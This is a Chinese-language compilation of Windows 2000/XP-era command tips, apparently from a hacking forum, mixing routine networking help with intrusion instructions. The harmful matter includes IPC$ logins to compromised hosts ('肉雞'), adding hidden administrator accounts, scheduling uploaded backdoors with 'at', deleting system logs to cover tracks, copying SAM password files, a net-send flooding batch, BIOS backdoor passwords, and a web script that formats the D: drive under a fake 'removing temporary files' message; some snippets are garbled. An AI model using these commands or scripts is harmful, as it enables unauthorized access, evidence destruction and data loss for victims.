1)如何查看本機所開(kāi)端口:
用netstat -a -n
LISTEN:偵聽(tīng)來(lái)自遠方的TCP端口的連接請(qǐng)求
SYN-SENT:再發送連接請(qǐng)求後等待匹配的連接請(qǐng)求
SYN-RECEIVED:再收到和(hé)發送一個(gè)連接請(qǐng)求後等待對方對連接請(qǐng)求的确認
ESTABLISHED:代表一個(gè)打開(kāi)的連接
FIN-WAIT-1:等待遠程TCP連接中斷請(qǐng)求,或先前的連接中斷請(qǐng)求的确認
FIN-WAIT-2:從遠程TCP等待連接中斷請(qǐng)求
CLOSE-WAIT:等待從本地用戶發來(lái)的連接中斷請(qǐng)求
CLOSING:等待遠程TCP對連接中斷的确認
LAST-ACK:等待原來(lái)的發向遠程TCP的連接中斷請(qǐng)求的确認
TIME-WAIT:等待足夠的時(shí)間(jiān)以确保遠程TCP接收到連接中斷請(qǐng)求的确認
CLOSED:沒有(yǒu)任何連接狀态
2)如何獲得(de)一個(gè)IP地址的主機名
利用ping -a ip 命令查看!再第一行(xíng)的pinging後面的『ip』前面的英文就是對方主機名!
同樣道(dào)理(lǐ),利用ping machine_name也可(kě)以得(de)到對方的ip
獲得(de)一個(gè)網站(zhàn)的ip地址的方法是:ping www.***.com
如果返回:Reply from *.*.*.*: TTL expired in transit的話(huà),代表TTL(生(shēng)命周期)在傳輸過程中過期
3)如何查看本機的ip地址
用ipconfig/all來(lái)查看
4)再使用net命令的時(shí)候遇到一些(xiē)錯誤代碼,如何查看對應的錯誤信息?
用命令 net helpmsg erorr_code來(lái)查看
比如錯誤代碼為(wèi):88
則查看命令為(wèi):net helpmsg 88 下面有(yǒu)這個(gè)錯誤代碼的中文顯示!
5)利用telnet連接到對方主機上(shàng),想獲得(de)一些(xiē)系統信息,用什麽命令?
set命令可(kě)以很(hěn)好的完成你(nǐ)所需要收集信息的任務的!
方法:再cmd下直接輸入set(telnet對方主機以後,也是直接set就可(kě)以了)
computername:主機名!
OS=Windows_NT :操作(zuò)系統的類型
path=C:/perl/bin/ :(perl的解釋器(qì)位置!)
systemDrive=c: 操作(zuò)系統盤符!
USERNAME=coldcrysky 當前登陸使用機器(qì)的用戶
(6)跟蹤路由器(qì)的命令是什麽?
tracert 格式:tracert ip
中間(jiān)會(huì)列出所有(yǒu)經過的路由器(qì)列表!這些(xiē)路由器(qì)如果是暴露再防火(huǒ)牆外面的話(huà),還(hái)可(kě)以看到路由的IP(這裏又涉及到了另外一個(gè)問題:為(wèi)什麽要把路由放在防火(huǒ)牆後面?原因呢,主要有(yǒu)兩點:1)保護路由器(qì)!因為(wèi)現在越來(lái)越多(duō)的攻擊和(hé)入侵已經開(kāi)始瞄準路由器(qì)了;2)為(wèi)路由器(qì)減少(shǎo)負擔!如果所有(yǒu)的過濾功能統統都壓在路由器(qì)上(shàng)面,路由器(qì)的負擔就太大(dà)了!)
7)簡單介紹一下cookie!
作(zuò)用:記錄訪問者的一些(xiē)信息。例如利用cookie記錄你(nǐ)所登陸這個(gè)網頁的次數(shù)、登陸時(shí)曾經輸入的信息……
大(dà)家(jiā)在Administrator的cookies目錄中可(kě)以看到很(hěn)多(duō)的記事本文檔吧(ba)?這些(xiē)都是cookie,雖然經過了加密,但(dàn)是仔細查找的話(huà),仍然能夠看到一些(xiē)敏感信息!況且現在也已經有(yǒu)了專門(mén)查看cookie的軟件!
那(nà)麽,如何清除cookie呢?一般情況下,可(kě)以在Internet選項中的常規選項卡中看到一個(gè)删除cookies的按鈕,點擊就可(kě)以清楚掉了~
除此以外,還(hái)要在internet選項中的內(nèi)容選項卡中找到自動完成按鈕,把裏面的四項都選中!然後點擊清除表單,清除密碼~
徹底禁止cookie的方法
a:在IE的Internet選項中,找到隐私選項卡!把裏面的滑塊拖到最上(shàng)面,邊上(shàng)寫着:阻止所有(yǒu)cookie
b:找到Windows目錄下的cookies目錄!把裏面的txt文件全部删除!,最後應該隻剩下一個(gè)index.dat文件!之後把這個(gè)文件夾設置成隻讀就可(kě)以了~
8)安裝2000的時(shí)候,速度會(huì)特别特别特别慢,怎麽加快安裝速度呢?
在DOS上(shàng)面安裝,應該用98啓動光盤來(lái)引導系統!然後按照下面的方法來(lái)做(zuò),可(kě)以提高(gāo)安裝速度:
g:/>cd windows -------假設G為(wèi)光驅 windows為(wèi)98的安裝目錄!
g:/windows>smartdrv -------加載smartdrv程序!加載後沒有(yǒu)任何提示信息!隻要不返回錯誤信息就是加載成功了~這時(shí)候安裝2K的話(huà),速度會(huì)很(hěn)快的哦~
9)Windows2K密碼忘記了,如何才能進入系統?
Windows2K的用戶配置信息和(hé)密碼保存在SAM文件裏!該文件位于:c:/winnt/system32/config目錄中!隻要删除這個(gè)文件就可(kě)以了~
另外,在c:/winnt/repair目錄中也同樣有(yǒu)一個(gè)SAM文件(這個(gè)是前者的備份!)如果你(nǐ)在登陸肉雞的時(shí)候,copy前面那(nà)個(gè)目錄中的SAM文件,你(nǐ)會(huì)發現COPY不下來(lái)!呵呵,為(wèi)什麽?因為(wèi)運行(xíng)着的2K系統會(huì)保護SAM文件啊~這個(gè)時(shí)候你(nǐ)就COPY這個(gè)就可(kě)以了!
10)ping不到,tracert不到,但(dàn)是卻能用nbtstat顯示對方的一些(xiē)信息,為(wèi)什麽?
因為(wèi)tracert和(hé)ping命令使用的是ICMP協議!而nbtstat是通(tōng)過對方的netbios端口來(lái)獲得(de)對方的主機信息的!使用的是UDP和(hé)TCP協議!如果對方僅僅隻對ICMP協議做(zuò)了禁止的話(huà),那(nà)通(tōng)過這個(gè)命令獲得(de)系統信息是正常的!
11)telnet上(shàng)去後,如何給對方開(kāi)共享?
開(kāi)共享的命令如下:net share c=c:/winnt/system 返回共享成功之後直接利用//ip/c來(lái)訪問對方的system目錄了~删除共享用 share c /del 命令就可(kě)以了
12)如何判斷對方的具體(tǐ)操作(zuò)系統版本?
首先用ver命令查看對方的版本号!
如果是5.00.2195的話(huà),為(wèi)2K;5.1.2600為(wèi)XP
從這裏可(kě)以區(qū)分出來(lái)到底是2K還(hái)是XP了~下面進行(xíng)更加具體(tǐ)的區(qū)分!
2K的pro和(hé)svr版本區(qū)分:
在telnet下,net shart查看啓動的服務~如果對方開(kāi)啓了Terminal Services服務的話(huà),基本上(shàng)可(kě)以判斷為(wèi)svr以上(shàng)的版本了~如果沒有(yǒu)開(kāi)啓,則為(wèi)pro!
XP的pro和(hé)home版的區(qū)分:
home edition是無法安裝iis的!所以,可(kě)以通(tōng)過iis服務來(lái)判斷到底是home版或者是pro了~
當然了,如果對方是pro,但(dàn)是将iis删除(停用)的話(huà),就沒辦法判斷了
13)如何查看98的随機啓動的程序?
在98下有(yǒu)一個(gè)實用配置程序(msconfig),中文名為(wèi):系統配置實用程序,調用的方法是在:開(kāi)始--運行(xíng)中輸入msconfig,在裏面,有(yǒu)一個(gè)啓動的選項卡,點擊後,可(kě)以看到很(hěn)多(duō)随即啓動程序,如果前面帶有(yǒu)鈎的話(huà),就是啓動時(shí)随機啓動的,取消的話(huà)就是把前面的小(xiǎo)鈎去掉就可(kě)以了~除了這裏以外,還(hái)有(yǒu)config.sys、autoexec.bat、system.ini、win.ini幾個(gè)選項卡,他們分别對應這幾個(gè)文件!隻不過在這裏更方便查看而已!
14)設置了BIOS密碼,可(kě)是卻忘記了,該怎麽辦?
如果是可(kě)以進入Windows的話(huà),可(kě)以找找biospwds和(hé)cmospwd這兩個(gè)軟件看看~
還(hái)有(yǒu)利用DEBUG法:
簡單介紹兩種:
1)-o 70 16
-o 71 13
-q
2)-o 70 16
-o 71 16
-q
另一種方法:copy法:
copy con cmos.com
輸入下面10個(gè)字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空(kōng)格,然後按下F6并回車(chē),退出,運行(xíng)這個(gè)cmos.com程序就可(kě)以了~
1)用通(tōng)用密碼:
Award Bios密碼:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI bios密碼:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
2)可(kě)以利用CMOS放電(diàn)
15)如何再命令行(xíng)下殺死對方進程?
利用微軟的2K以上(shàng)操作(zuò)系統都是含有(yǒu)這個(gè)工具的!該工具包含在2K光盤的/support/tools文件夾下!裏面有(yǒu)安裝程序,點擊後,就安裝了2K的support tools工具包,裏面有(yǒu)kill這個(gè)工具,這時(shí)候再cmd下可(kě)以輸入kill/?,就可(kě)以看到幫助了,使用這個(gè)命令的格式是:kill pid (pid是進程的ID号!)再任務管理(lǐ)器(qì)中可(kě)以看到進程的ID号
那(nà)再命令行(xíng)下如何查看進程呢?呵呵,這就用到了系統自帶的有(yǒu)一個(gè)後門(mén)工具了:再剛才說得(de)那(nà)個(gè)目錄中,還(hái)有(yǒu)一個(gè)工具叫tlist !直接輸入tlist就可(kě)以得(de)到pid遇隊形程序的列表了~
16)如何查看本機的DNS服務器(qì)?
ipconfig其實是可(kě)以的,還(hái)可(kě)以利用一個(gè)命令:再cmd下輸入netsh,進入到netsh>提示符,再輸入:int ip 進入到interface ip> 然後再次輸入dump,這時(shí)候屏幕上(shàng)出現當前連接的配置情況了
1)查看本機IP:首先鍵入netsh,再netsh>提示符下輸入:interface 回車(chē) 之後:ip 回車(chē) 再之後:show address 回車(chē) 這樣,就可(kě)以看到當前連接的IP地址和(hé)子網掩碼。
2)修改網絡配置:接着上(shàng)面的命令,我們使用:set address name=“本地連接” source=static addr=192.168.0.200 mask=255.255.255.0,這樣就修改了當前的IP地址,用show address來(lái)看
3)顯示一個(gè)完整的網絡配置教本:
剛才說過,第一個(gè)命令顯示的信息不如ipconfig/all全面,不用着急,netsh再打印顯示網絡配置上(shàng),還(hái)是有(yǒu)自己的特色的!例如:再interface ip>狀态下輸入:dump,會(huì)顯示一個(gè)清單,顯示所有(yǒu)本地連接(不管你(nǐ)是否使用~)與netstat -an不完全一樣!
17)肉雞上(shàng)的部分文件無法删除,怎麽辦?
如果對方的文件夾是隻讀的話(huà),會(huì)出現拒絕訪問的字樣!這時(shí)候,我們可(kě)以再del命令後面加上(shàng)/f參數(shù)來(lái)删除!
18)再說一個(gè)可(kě)以限制(zhì)用戶登陸時(shí)間(jiān)的命令!
再net命令中就可(kě)以實現這樣的功能!具體(tǐ)方法如下:
假如我們打算(suàn)讓:coldcrysky這個(gè)用戶再周日到周易的上(shàng)午八點到下午四點之間(jiān)可(kě)以登陸,用這個(gè)命令:
net user coldcrysky /timesunday-monday,08:00-16:00
之後利用net user coldcrysky命令來(lái)查看登陸時(shí)間(jiān)的限制(zhì),可(kě)以看到是我們所規定的時(shí)間(jiān)
在此,特别提醒各位:命令中:星期日才是一周的開(kāi)始!!!不要當成星期一!
如果想恢複回去:net user coldcrysky /time:all --這樣就可(kě)以了~
19)如何删除windows2K的默認共享?
首先打開(kāi)記事本,輸入如下內(nèi)容:
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete
之後點擊保存成批處理(lǐ)文件(後綴為(wèi):bat的文件!)!加入到啓動組中就可(kě)以了~
20)139端口的又一用法
1:Net use //XXX.XXX.XXX.XXX/ipc$ "password" /user:"username" 建立一個(gè)IPC連接
2:net use H: //XXX.XXX.XXX.XXX/C$ 将對方的C盤映射為(wèi)自己的h盤
3:copy c on h:/reboot.bat
Iisreset /reboot
CTRL+Z
在對方的C盤上(shàng)生(shēng)成一個(gè)能重啓機器(qì)的文件
4:net time //XXX.XXX.XXX.XXX 得(de)到對方機器(qì)時(shí)間(jiān)
5:at //XXX.XXX.XXX.XXX 重啓的時(shí)間(jiān) c:/reboot.bat 設定對方重啓的時(shí)間(jiān)!
6:at //XXX.XXX.XXX.XXX 查看任務上(shàng)面是否添加了這個(gè)任務
7:等對方重啓好了~
21)利用批處理(lǐ)文件來(lái)建立一個(gè)記錄3389登陸者信息的記錄器(qì)
由于Terminal Service默認是沒有(yǒu)日志(zhì)記錄的,隻能依靠他的系統日志(zhì),但(dàn)是系統日志(zhì)隻能記錄一些(xiē)大(dà)動作(zuò)(開(kāi)啓或停止服務),那(nà)麽,如何用批處理(lǐ)文件來(lái)編寫一個(gè)将是3389端口的程序呢?很(hěn)簡單:
建立一個(gè)批處理(lǐ)文件:內(nèi)容如下:
@echo off
date/t >> c:/3389log.txt
:TS3389
time/t >> c:/3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:/3389log.txt
goto :TS3389
之後保存!
22)網絡命令小(xiǎo)節
A、NET命令:
IPC連接:格式 net use //對方IP/ipc$ "密碼" user:"用戶名" 『建立IPC連接~』
net use //對方IP/ipc$ /delete 『斷開(kāi)連接~』
以下操作(zuò)需要在連接到對方主機後才可(kě)進行(xíng)!!!
net user coldcrysky xyz /add 『在連接的目标主機中加入一個(gè)用戶名為(wèi)COLDCRYSKY 密碼為(wèi)WYZ的用戶』
net localgroup Administrator coldcrysky /add 『把名為(wèi)coldcrysky的用戶加入ADMIN組-以為(wèi)着權限的提高(gāo)』
net use z://對方IP/C$ 『把對方的C盤映射為(wèi)本機的Z盤-可(kě)依照需要更改映射盤符!』
net start telnet 『開(kāi)啓TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密碼改為(wèi)COLDCRYSKY』
B、AT命令:
查看遠程機時(shí)間(jiān):net time //對方IP
加入一項新任務:
at //對方IP 時(shí)間(jiān) 文件名 『用來(lái)把自己上(shàng)傳的後門(mén)程序在制(zhì)定時(shí)間(jiān)運行(xíng),方便以後進入肉雞!』
C、TELNET命令:
telnet 對方IP 端口 『作(zuò)用不用我說了吧(ba)???』
D、FTP命令:
登陸:ftp 對方網址(IP地址)
上(shàng)傳文件:get 文件在本機完整路徑 對方文件存放完整路徑
下載文件:put 對方文件完整路徑 本機存放文件路徑
E、COPY命令:
在建立連接後(尤其是IPC$連接後,很(hěn)有(yǒu)用的命令哦~)
⑴copy index.htm //127.0.0.1/c$/index.htm
『将本機index.htm文件複制(zhì)到127.0.0.1的C盤下,如果要放到對方的NT目錄下,則把C改為(wèi)admin$』
⑵copy //127.0.0.1/admin/repair/sam_ c: 『将遠程機數(shù)據庫文件拷貝到本機C盤根目錄下』F、SET命令:
主要用于分析目标計(jì)算(suàn)機的基本信息用!具體(tǐ)使用方法請(qǐng)查找相關文件!
G、NBTSTAT命令:
nbtstat -A 對方IP (這個(gè)A大(dà)寫)
『在其中顯示<037>前面的英文或數(shù)字就是計(jì)算(suàn)機名稱!當然,也可(kě)以利用PING -A 對方ip的方法來(lái)查看對方主機名!效果相同!!!』
H、SHUTDOWN命令:
『用來(lái)關閉對方NT服務的命令』格式如下:
shutdown //IP地址 t:20
『20秒(miǎo)後自動關閉對方NT服務!由于對對方機器(qì)影(yǐng)響較大(dà),慎用!!!』
I、DIR命令:
還(hái)用我說麽?大(dà)家(jiā)是不是早就該掌握了???(不知道(dào)的還(hái)是查閱相關資料吧(ba)~~~)
J、ECHO命令:
echo coldcrysky >index.htm 『用coldcrysky覆蓋掉原INDEX.HTM中所有(yǒu)內(nèi)容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令:
更改文件屬性用,格式:
Attrib -r index.htm 『去掉隻讀屬性』(+- 分别代表增加和(hé)減少(shǎo))
L、DEL命令:
『删除日志(zhì)的時(shí)候用!』
del c:/winnt/system32/logfiles/*.*
del c:/winnt/system32/config/*.evt
del c:/winnt/system32/dtclog/*.*
del c:/winnt/system32/*.log
del c:/winnt/system32/*.txt
del c:/winnt/*.txt
del c:/winnt/*.log
M、PING命令:
-t :ping制(zhì)定IP,知道(dào)網絡斷開(kāi)或按CTRL+C結束!
-a :解釋PING IP的主機名
-n count :發送count指定的ECHO數(shù)據包,默認為(wèi)4個(gè)!
23)開(kāi)啓服務和(hé)停止服務的net start and net stop
net start和(hé)net stop到底能開(kāi)啓什麽服務?其實這點也不需要你(nǐ)強記,記住這個(gè)命令就可(kě)以了:net help start和(hé)net help stop,這兩個(gè)會(huì)顯示出你(nǐ)所能開(kāi)啓的服務有(yǒu)那(nà)些(xiē)~~
24)關于雙系統的兩個(gè)問題:
A、如何在雙系統(98、2000)中安全删除2K?
先制(zhì)作(zuò)一張Windows 98 的啓動軟盤,再用它啓動你(nǐ)的計(jì)算(suàn)機,運行(xíng)sys命令恢複Windows 98引導記錄後,再運行(xíng)fdisk/mbr恢複主引導記錄,完成後進入Windows 98,把winnt 和(hé)system volumn information 目錄删除,再删掉C盤上(shàng)的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行(xíng)了。
B、 Windows 98/XP雙系統啓動菜單修複
1.修複前,在BIOS中設置從光驅啓動。用Windows XP安裝盤啓動電(diàn)腦(nǎo),在加載必要的驅動後,出現Windows XP的安裝界面。有(yǒu)三個(gè)選項:
(1)要現在開(kāi)始安裝Windows XP,請(qǐng)按“Enter”鍵。
(2)要用“恢複控制(zhì)台”修複Windows XP安裝,按“R”鍵。
(3)要退出安裝程序,不安裝Windows XP,按“F3”鍵;
2. 按“R”鍵,進入“Microsoft Windows XP (TM) 故障恢複控制(zhì)台”界面;故障恢複控制(zhì)台提供系統修複和(hé)故障恢複功能。系統這時(shí)會(huì)搜尋已安裝的Windows XP系統文件,然後顯示搜尋結果,并詢問“要登錄到哪個(gè)Windows XP安裝(要取消,請(qǐng)按Enter)”,選擇1. D:/Windows,回車(chē),系統會(huì)再詢問“管理(lǐ)員密碼”,再鍵入安裝Windows XP時(shí)設置的管理(lǐ)員密碼,回車(chē),出現D:/Windows〉,這時(shí)需要輸入修複命令Fixboot,後面的參數(shù)為(wèi)啓動扇區(qū)要寫入的磁盤盤符,這裏填入C:,回車(chē)。修複完成,鍵入Exit退出。重啓後就會(huì)看到久違的雙重啓動菜單了。并且,這樣修複後基本不産生(shēng)垃圾文件。
25)這裏說幾個(gè)主頁惡意代碼
A、死循環代碼:
『把下列代碼加入到網頁中,可(kě)達到如上(shàng)效果』
說明(míng):當含有(yǒu)這段代碼的網頁被人(rén)點擊,連接就會(huì)不斷的打開(kāi)IE浏覽器(qì),直到你(nǐ)的系統資源浪費到0%~隻有(yǒu)重新啓動才能正常使用!
預防方法:禁用所有(yǒu)的ActiveX控件和(hé)插件!因為(wèi)這是一個(gè)ActiveX教本程序~
B、恐怖的大(dà)圖片:
『把下列代碼加入到網頁中,可(kě)達到如上(shàng)效果』
說明(míng):當打開(kāi)這樣的網頁,IE會(huì)不斷的解釋試圖打開(kāi),但(dàn)由于圖片實在太大(dà),超出了其處理(lǐ)能力,所以
C、地震死機代碼:
『把下列代碼加入到網頁中,可(kě)達到如上(shàng)效果』
說明(míng): 是windows9x的設備名稱解析漏洞!
WINDOWS9x的/con/con設備名稱解析漏洞允許用戶進行(xíng)攻擊,倒是98死機。原理(lǐ):我們知道(dào),CON是DOS下的特殊設備名,不允許做(zuò)文件名,如果我們在DOS下鍵入如下命令:copy coldcrysky.txt con,系統會(huì)顯示coldcrysky.txt的內(nèi)容,如果換成:copy coldcrysky.txt>con系統會(huì)提示文件不能拷貝到文件自身。如果吧(ba)con換成LPT或PRN,則輸出coldcrysky.txt到打印機。由此可(kě)見,CON代表文件本身,如果使用/CON/CON命令,則意味着系統不斷調用文件本身,視(shì)系統資源迅速枯竭,連按CTRL+ALT+DEL的機會(huì)都沒有(yǒu)~
解決辦法:
對于9X系統,強烈建議打補丁!!!2000和(hé)XP則不會(huì)死機~
D、格式化硬盤:(最恐怖的~~~慎用!!!請(qǐng)勿用于非法用途!!!使用後如果有(yǒu)任何負作(zuò)用,後果自負!與傷寒天空(kōng)『ColdCrySky』;亂刀留影(yǐng)無關!!!)
scr,Reset();
scr.Path="C://WINDOWS//StartMenu//Programs//啓動//startup.htm";
scr.Doc="
"
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();
說明(míng):當您浏覽了網頁,會(huì)把startup.hta文件寫入啓動文件夾,并提示WINDOWS正在删除臨時(shí)文件!實際上(shàng)是在格式化你(nǐ)的D盤,代碼中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對應為(wèi):Windows Scripting Host Shell Object。代碼中的:WSH全稱是:Windows Scripting Host,是微軟的一種基于32位系統平台與語言無關的教本解釋機制(zhì),它使得(de)腳本能在WINDOWS桌面或命令提示符下運行(xíng)~WSH所對應的程序WScript.exe是一個(gè)腳本語言解釋器(qì),位于WINDOWS所在文件夾下,所以它可(kě)以像執行(xíng)批處理(lǐ)文件一樣執行(xíng)WSH腳本程序~
解決方法:1)更新您的浏覽器(qì),使用最新的浏覽器(qì)上(shàng)網!
2)修改msdos.sys,在其中加入:Bootmentu=0命令行(xíng),目的是禁用啓動菜單。
3)吧(ba)format.com改名
4)禁用WSH。具體(tǐ)方法:在win98中,從添加删除程序中點擊WINDOWS安裝程序,打開(kāi)附件一項,将WINDOWS SCRIPTING HOST前面的選項去掉,就可(kě)以卸載掉WSH了~~~win2000和(hé)xp的用戶可(kě)以在我的電(diàn)腦(nǎo)-工具菜單-文件夾選項-選擇文件類型,找到VBS VBSCRIPT FILE選項,點擊删除!
26)系統自帶的系統工具
1、msinfo32.exe
位于C:/Program Files/Common Files
Microsoft Shared/Msinfo/msinfo32.exe,顯示計(jì)算(suàn)機中的有(yǒu)關系統信息,可(kě)用其診斷、解決計(jì)算(suàn)機問題并查看遠程系統所生(shēng)成的系統報告。
2、drwatson.exe --
位于C: /Windows /drwatson.exe,當某個(gè)應用程序在運行(xíng)過程中出錯時(shí),它就會(huì)将出錯的程序以及出錯的內(nèi)存地址一一記錄下來(lái),并保存為(wèi)Windows的Drwatson子目錄下的*.wlg記錄文件。
3、sfc.exe
位于C:/Windows/System/sfc.exe,用于自動搜索被改變、删除或損壞了的系統文件。
4、msconfig.exe
位于C:/Windows/System/msconfig.exe,通(tōng)過修改啓動方式以及啓動時(shí)運行(xíng)哪些(xiē)應用程序等系統配置,從而達到快速排除故障的目的。
5、scanreg.exe
位于C:/windows/command/scanreg.exe(DOS版本)及C:/windows/scanregw.exe(Windows版本),用于檢查、修複、備份以及還(hái)原系統注冊表及相關配置文件的工具軟件,防止因注冊表數(shù)據被破壞而導緻的系統故障。
6、vcmui.exe
位于C:/Windows/vcmui.exe,在後台自動将被覆蓋的驅動程序備份下來(lái),當我們安裝的新驅動出錯時(shí)可(kě)用它進行(xíng)恢複。
7、winrep.exe
位于C:/Windows/winrep.exe,能自動收集有(yǒu)關系統信息并提示用戶輸入故障所在,幫我們編寫一篇完整的“求援”報告,并将其發送給有(yǒu)關技(jì)術(shù)維護人(rén)員,簡化“求援”操作(zuò)。
這七個(gè)Windows自帶的小(xiǎo)程序可(kě)以在開(kāi)始菜單--運行(xíng)中直接輸入文件名(無需輸入擴展名)調出該程序!
27)批處理(lǐ)在入侵中的幾則妙用!
A、簡化IPC$登陸肉雞的操作(zuò):
用記事本建立一個(gè)名字為(wèi):ipcruqin.bat的批處理(lǐ)文件,內(nèi)容如下:
@net use //%1/ipc$ %3 /u:"%2"
@echo OK!已經成功建立連接
之後,大(dà)家(jiā)在CMD下輸入:ipcruqin.bat 肉雞IP 肉雞的admin帳号/用戶的密碼。就可(kě)以登陸上(shàng)去了,而不需要那(nà)一大(dà)長串的命令了!
B、批處理(lǐ)轟炸對方電(diàn)腦(nǎo):
打開(kāi)一記事本,在裏面輸入如下內(nèi)容:
@echo 正在轟炸中……
tart
@net send %1 %2
@if errorlevel 1 goto over
goto start
ver
@echo 發送失敗
将其保存為(wèi)bat格式的文件即可(kě),使用方法:*.bat(該批處理(lǐ)文件的名字)+ 空(kōng)格 + 目标IP + 空(kōng)格 + 你(nǐ)要對他說得(de)話(huà)!
這次先簡單介紹這三個(gè)!等下次有(yǒu)機會(huì)再給大(dà)家(jiā)介紹更多(duō)的批處理(lǐ)文件的用途!
28)再說幾個(gè)非常簡單實用的DOS命令(工具):
A、fport.exe --查看那(nà)些(xiē)端口都是那(nà)些(xiē)程序使用的命令。
B、netstat -an --查看那(nà)些(xiē)端口于外部的IP連接。比如這裏顯示 :23 XX.XX.XX.XX 而你(nǐ)又沒有(yǒu)開(kāi)23端口,那(nà)麽,呵呵……還(hái)用我說麽?
C、letmain.exe //ip -admin -d --列出本機的administrators組的用戶名查看是否有(yǒu)異常。
D、pslist.exe --列出進程
E、pskill.exe --殺掉進程,有(yǒu)時(shí)候再任務管理(lǐ)器(qì)中無法終止程序,那(nà)就用這個(gè)工具來(lái)停止進程。
F、login.exe --列出當前有(yǒu)那(nà)些(xiē)用戶登陸再你(nǐ)的機器(qì)上(shàng)。
局域網應用問題專題解答(dá)
問:在由三台電(diàn)腦(nǎo)組成的局域網中,我在其中一台電(diàn)腦(nǎo)上(shàng)用過Windows優化大(dà)師(shī)後,為(wèi)什麽這台電(diàn)腦(nǎo)就不能登錄網絡,并且還(hái)提示找不到撥号适配器(qì)?
答(dá):根據你(nǐ)說的情況,是沒有(yǒu)安裝“撥号網絡”。解決方法是:在“控制(zhì)面闆”的“添加/删除程序”中,選擇“Windows安裝程序”,在“組件”的“通(tōng)訊”中選擇“撥号網絡”,然後将Windows安裝盤放入光驅進行(xíng)安裝,重新啓動計(jì)算(suàn)機後就可(kě)使用撥号網絡了。
我新購的網卡在電(diàn)腦(nǎo)上(shàng)無法安裝,而在其他電(diàn)腦(nǎo)上(shàng)卻使用正常,這是怎麽回事?
答(dá):如果在電(diàn)腦(nǎo)中安裝好網卡後,系統沒有(yǒu)提示找到新硬件,你(nǐ)可(kě)運行(xíng)“添加新硬件向導”來(lái)讓系統搜索新硬件。方法是單擊“開(kāi)始”,指向“設置”,單擊“控制(zhì)面闆”,然後再雙擊“添加新硬件”。按照屏幕提示操作(zuò)。你(nǐ)可(kě)選“讓Windows搜索新硬件嗎?”,單擊“是(推薦)”,然後再單擊“下一步”,讓系統找到網卡再安裝其驅動。
而如果出現以下任何現象,網卡或者網卡所在的插槽損壞:
1、“添加新硬件向導”檢測不到網卡;
2、“添加新硬件向導”能夠檢測到網卡,但(dàn)無法正常工作(zuò)。
為(wèi)了确定到底是網卡還(hái)是插槽的問題,可(kě)以檢查網卡是否牢靠插入插槽之中。如果網卡已牢靠插入插槽之中,請(qǐng)改插到其他插槽之中試試。如果問題仍未解決,則可(kě)能是網卡損壞或與你(nǐ)的電(diàn)腦(nǎo)不兼容,可(kě)更換之。
我的電(diàn)腦(nǎo)出現“網上(shàng)鄰居”中找不到其他聯網電(diàn)腦(nǎo)的故障,如何解決?
答(dá):“網上(shàng)鄰居”是按工作(zuò)組顯示計(jì)算(suàn)機的。如果你(nǐ)的電(diàn)腦(nǎo)沒有(yǒu)設置工作(zuò)組名稱,打開(kāi)“網上(shàng)鄰居”時(shí)就可(kě)能看不到其他電(diàn)腦(nǎo)。單擊“開(kāi)始”,指向“設置”,單擊“控制(zhì)面闆”,雙擊“網絡”,然後再單擊“标識”選項卡。你(nǐ)局域網中所有(yǒu)電(diàn)腦(nǎo)“工作(zuò)組”框中的名稱應為(wèi)一樣,如有(yǒu)不同你(nǐ)可(kě)在此框中鍵入相同的工作(zuò)組名稱,然後單擊“确定”重啓電(diàn)腦(nǎo)既可(kě)。
此外,如果“網上(shàng)鄰居”中不出現“整個(gè)網絡”圖标,可(kě)能是在Windows中沒有(yǒu)安裝必要的網絡組件。要與網絡上(shàng)的其他計(jì)算(suàn)機連接,則必須安裝以下組件:Microsoft網絡客戶、網絡适配器(qì)、至少(shǎo)一種網絡協議(如IPX/SPX、TCP/IP等)。可(kě)打開(kāi)“網絡”,檢查“配置”選項卡上(shàng)的列表,确保已安裝了各種必要的網絡組件。如有(yǒu),你(nǐ)可(kě)重新安裝各種缺少(shǎo)的組件即可(kě)。
問:辦公室機器(qì)桌面的“網上(shàng)鄰居”圖标沒了,能上(shàng)Internet,但(dàn)無法浏覽其他機器(qì)上(shàng)的資源了,怎麽辦?
答(dá):說明(míng)你(nǐ)的Internet屬性完好,但(dàn)網上(shàng)鄰居屬性中的“Microsoft 網絡用戶”這一客戶組件沒了。
進到“控制(zhì)面闆”中雙擊“網絡”,先在彈出的網絡對話(huà)框中點按“添加”按鈕,再從随後彈出的“請(qǐng)選擇網絡組件類型”對話(huà)框中雙擊“客戶”,最後從随後的“選擇網絡客戶機”對話(huà)框的左側選擇“Microsoft”後再選擇“Microsoft 網絡用戶”,“确定”再“确定”并據提示重啓計(jì)算(suàn)機就ok啦!
問:右鍵中的“共享”命令已經顯身!但(dàn)我設了共享不想讓别人(rén)從網上(shàng)鄰居中看到這個(gè)共享目錄,隻有(yǒu)自己知道(dào)且能實現異地機上(shàng)有(yǒu)完全操作(zuò)的權限。
答(dá):找到你(nǐ)想要共享的文件夾并右鍵點選“共享…”----這裏我就以共享“D:/Windows 98”為(wèi)例,先選中“共享為(wèi)”後在共享名“Windows 98(當然也可(kě)改名共享哦)”後加一英文狀态的“$”符,再選中“完全”并輸入設定好“密碼”,然後“确定”一次密碼就OK了。
這樣一來(lái),絕對保證别人(rén)從網上(shàng)鄰居中看不到這個(gè)共享目錄的!那(nà)~~自己想從異地機上(shàng)進入并實現完全操作(zuò)時(shí)怎麽辦呢?呵呵,這麽辦:從異地機的地址欄中鍵入“//(機器(qì)名)/$(你(nǐ)的共享目錄名)”并“ENTER”,再輸入密碼并确定後,就進入啦!這樣你(nǐ)可(kě)靜悄悄地實現異地機上(shàng)在自己設定的共享目錄內(nèi)進行(xíng)完全操作(zuò)啦!不過注意其中“/”不能誤輸入成“/”
問:如何使用交換機的UpLink端口,怎樣連接?使用了UpLink口後,是否還(hái)可(kě)以使用其相鄰最近的端口?
